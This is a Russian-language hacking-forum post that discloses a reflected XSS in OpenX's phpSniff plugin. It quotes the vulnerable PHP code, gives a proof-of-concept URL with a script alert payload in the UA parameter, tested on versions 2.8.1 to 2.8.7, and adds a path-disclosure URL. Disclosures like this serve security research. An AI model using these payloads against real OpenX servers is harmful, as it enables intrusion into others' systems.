Показать сообщение отдельно
Старый 12.10.2010, 20:43   #4
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

pXSS
/plugins/deliveryLimitations/Client/lib/phpSniff/index.php
PHP код:
/*...*/
require_once('phpSniff.class.php');
require_once('phpTimer.class.php');
/*...*/
$sniffer_settings = array('check_cookies'=>$GET_VARS['cc'],
                          'default_language'=>$GET_VARS['dl'],
                          'allow_masquerading'=>$GET_VARS['am']);
$client =& new phpSniff($GET_VARS['UA'],$sniffer_settings);
/*...*/
<tr>
<td bgcolor="<?php print $c1_bg?>">ua</td>
<td width="100%" bgcolor="<?php print $c2_bg?>"><?php print $client->get_property('ua');?></td>
</tr>
/*...*/
/plugins/deliveryLimitations/Client/lib/phpSniff/phpSniff.class.php
PHP код:
/*...*/
function phpSniff($UA='',$settings true)
{
/*..*/
if(empty($UA)) return false;
        
        
$this->_set_browser('ua',$UA);
        if(
$run$this->init();
/*...*/
  
function property ($p=null)
    {   if(
$p==null)
        {   return 
$this->_browser_info;
        }
        else
        {   return 
$this->_browser_info[strtolower($p)];
        }
    }
/*...*/
 
function _set_browser ($k,$v)
    {   
$this->_browser_info[strtolower($k)] = strtolower($v);
    }
/*...*/
function get_property ($p)
    {    return 
$this->property($p);
    }
/*...*/ 
Код:
PoC
http://[host]/[path]/plugins/deliveryLimitations/Client/lib/phpSniff/index.php?UA=%3Cscript%3Ealert%28123%29%3C/script%3E
Проверил на OpenX 2.8.1, 2.8.2, 2.8.3, 2.8.4, 2.8.6, 2.8.7.

Path disclosure
условия -> никаких
на данный момент на последней ветке 2.8.7 что нашел --> работает
Код:
PoC http://[host]/[path]/www/admin/plugins/openXWorkflow/application/bootstrap.php
}{оттабыч вне форума   Ответить с цитированием